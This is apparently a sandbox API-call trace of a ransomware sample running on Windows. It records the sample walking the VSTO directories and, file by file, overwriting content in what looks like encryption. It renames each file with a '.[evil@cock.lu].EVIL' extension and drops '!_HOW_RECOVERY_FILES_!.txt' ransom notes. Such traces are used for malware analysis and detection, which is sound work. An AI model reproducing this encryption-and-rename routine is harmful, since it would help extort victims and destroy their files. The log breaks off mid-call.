[0089.271] FindNextFileW (in: hFindFile=0x84b11dd500, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.271] wcsstr (_Str="10.0", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.271] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0") returned 57 [0089.271] wcscmp (_String1=".", _String2="10.0") returned -1 [0089.271] wcscmp (_String1="..", _String2="10.0") returned -1 [0089.271] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0") returned 0x39 [0089.271] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0") returned 0x0 [0089.271] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*" [0089.271] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd800 [0089.371] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.371] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\.") returned 59 [0089.372] wcscmp (_String1=".", _String2=".") returned 0 [0089.372] FindNextFileW (in: hFindFile=0x84b11dd800, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0089.372] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.372] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\..") returned 60 [0089.372] wcscmp (_String1=".", _String2="..") returned -1 [0089.372] wcscmp (_String1="..", _String2="..") returned 0 [0089.372] FindNextFileW (in: hFindFile=0x84b11dd800, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0089.372] wcsstr (_Str="1033", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.372] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 62 [0089.372] wcscmp (_String1=".", _String2="1033") returned -1 [0089.372] wcscmp (_String1="..", _String2="1033") returned -1 [0089.372] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 0x3e [0089.372] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 0x0 [0089.372] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*" [0089.372] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11dd320 [0089.373] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.373] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\.") returned 64 [0089.373] wcscmp (_String1=".", _String2=".") returned 0 [0089.373] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0089.373] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.373] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\..") returned 65 [0089.373] wcscmp (_String1=".", _String2="..") returned -1 [0089.373] wcscmp (_String1="..", _String2="..") returned 0 [0089.373] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0089.373] wcsstr (_Str="VSTOInstallerUI.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.373] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0089.373] wcscmp (_String1="VSTOInstallerUI.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.373] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="VSTOInstallerUI.dll") returned 0x0 [0089.373] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 0x52 [0089.373] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0089.375] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd280*=0x30a0, lpOverlapped=0x0) returned 1 [0089.460] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.461] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.461] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.461] _errno () returned 0x84b1160840 [0089.461] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.461] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x30c0, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd280*=0x30c0, lpOverlapped=0x0) returned 1 [0089.461] CloseHandle (hObject=0x1ac) returned 1 [0089.461] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.461] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.461] __uncaught_exception () returned 0x84b1160800 [0089.461] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.462] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.[evil@cock.lu].evil")) returned 1 [0089.462] ??_V@YAXPEAX@Z () returned 0x1 [0089.469] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll", dwFileAttributes=0x0) returned 0 [0089.470] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0089.470] wcsstr (_Str="VSTOLoaderUI.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.470] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 79 [0089.470] wcscmp (_String1="VSTOLoaderUI.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.470] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="VSTOLoaderUI.dll") returned 0x0 [0089.470] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll") returned 0x4f [0089.470] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ac [0089.472] ReadFile (in: hFile=0x1ac, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd280*=0x5080, lpOverlapped=0x0) returned 1 [0089.636] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.636] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.636] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.636] _errno () returned 0x84b1160840 [0089.636] SetFilePointer (in: hFile=0x1ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.636] WriteFile (in: hFile=0x1ac, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x84b0fdd280, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd280*=0x50a0, lpOverlapped=0x0) returned 1 [0089.636] CloseHandle (hObject=0x1ac) returned 1 [0089.636] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.636] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.637] __uncaught_exception () returned 0x84b1160800 [0089.637] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.637] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoloaderui.dll.[evil@cock.lu].evil")) returned 1 [0089.637] ??_V@YAXPEAX@Z () returned 0x1 [0089.643] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll", dwFileAttributes=0x0) returned 0 [0089.643] FindNextFileW (in: hFindFile=0x84b11dd320, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0089.643] FindClose (in: hFindFile=0x84b11dd320 | out: hFindFile=0x84b11dd320) returned 1 [0089.643] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033") returned 0x3e [0089.643] strlen (_Str="${KEY}") returned 0x6 [0089.643] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.643] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.643] strlen (_Str="${CODE}") returned 0x7 [0089.643] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.643] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.643] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.643] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.645] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.645] __uncaught_exception () returned 0x84b1160800 [0089.645] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.645] FindNextFileW (in: hFindFile=0x84b11dd800, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0089.645] wcsstr (_Str="VSTOInstaller.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.645] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 75 [0089.646] wcscmp (_String1="VSTOInstaller.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.646] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="VSTOInstaller.exe") returned 0x0 [0089.646] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe") returned 0x4b [0089.646] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0089.648] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x18888, lpOverlapped=0x0) returned 1 [0089.743] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.743] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.743] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.743] _errno () returned 0x84b1160840 [0089.743] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.743] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x188a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x188a0, lpOverlapped=0x0) returned 1 [0089.743] CloseHandle (hObject=0x1a8) returned 1 [0089.743] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.744] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.744] __uncaught_exception () returned 0x84b1160800 [0089.744] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.744] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoinstaller.exe.[evil@cock.lu].evil")) returned 1 [0089.744] ??_V@YAXPEAX@Z () returned 0x1 [0089.747] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOInstaller.exe", dwFileAttributes=0x0) returned 0 [0089.747] FindNextFileW (in: hFindFile=0x84b11dd800, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0089.747] wcsstr (_Str="VSTOLoader.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.747] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 72 [0089.747] wcscmp (_String1="VSTOLoader.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.748] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="VSTOLoader.dll") returned 0x0 [0089.748] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll") returned 0x48 [0089.748] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0089.753] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x59a70, lpOverlapped=0x0) returned 1 [0089.775] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.775] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.775] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.775] _errno () returned 0x84b1160840 [0089.775] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.775] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x59a80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x59a80, lpOverlapped=0x0) returned 1 [0089.776] CloseHandle (hObject=0x1a8) returned 1 [0089.776] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.776] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.776] __uncaught_exception () returned 0x84b1160800 [0089.777] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.777] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.[evil@cock.lu].evil")) returned 1 [0089.777] ??_V@YAXPEAX@Z () returned 0x1 [0089.780] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOLoader.dll", dwFileAttributes=0x0) returned 0 [0089.780] FindNextFileW (in: hFindFile=0x84b11dd800, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0089.780] wcsstr (_Str="VSTOMessageProvider.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.780] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 81 [0089.780] wcscmp (_String1="VSTOMessageProvider.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.780] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="VSTOMessageProvider.dll") returned 0x0 [0089.780] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 0x51 [0089.780] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0089.783] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbee8, lpOverlapped=0x0) returned 1 [0089.808] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.808] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.808] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.808] _errno () returned 0x84b1160840 [0089.808] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.808] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xbf00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbf00, lpOverlapped=0x0) returned 1 [0089.809] CloseHandle (hObject=0x1a8) returned 1 [0089.809] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.809] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.809] __uncaught_exception () returned 0x84b1160800 [0089.809] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.809] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.[evil@cock.lu].evil")) returned 1 [0089.810] ??_V@YAXPEAX@Z () returned 0x1 [0089.813] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\VSTOMessageProvider.dll", dwFileAttributes=0x0) returned 0 [0089.813] FindNextFileW (in: hFindFile=0x84b11dd800, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0089.813] FindClose (in: hFindFile=0x84b11dd800 | out: hFindFile=0x84b11dd800) returned 1 [0089.813] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0") returned 0x39 [0089.813] strlen (_Str="${KEY}") returned 0x6 [0089.813] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0089.813] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0089.813] strlen (_Str="${CODE}") returned 0x7 [0089.813] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0089.813] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.813] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0089.813] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.814] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0089.814] __uncaught_exception () returned 0x84b1160800 [0089.814] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.814] FindNextFileW (in: hFindFile=0x84b11dd500, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0089.814] wcsstr (_Str="vstoee.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0089.814] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 63 [0089.814] wcscmp (_String1="vstoee.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0089.814] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="vstoee.dll") returned 0x0 [0089.814] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll") returned 0x3f [0089.815] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0089.816] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x29080, lpOverlapped=0x0) returned 1 [0089.900] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0089.900] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.900] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0089.900] _errno () returned 0x84b1160840 [0089.900] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.900] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x290a0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x290a0, lpOverlapped=0x0) returned 1 [0089.900] CloseHandle (hObject=0x1a4) returned 1 [0089.901] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0089.901] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0089.901] __uncaught_exception () returned 0x84b1160800 [0089.901] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0089.902] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee.dll"), lpNewFileName="C:\\\\Program 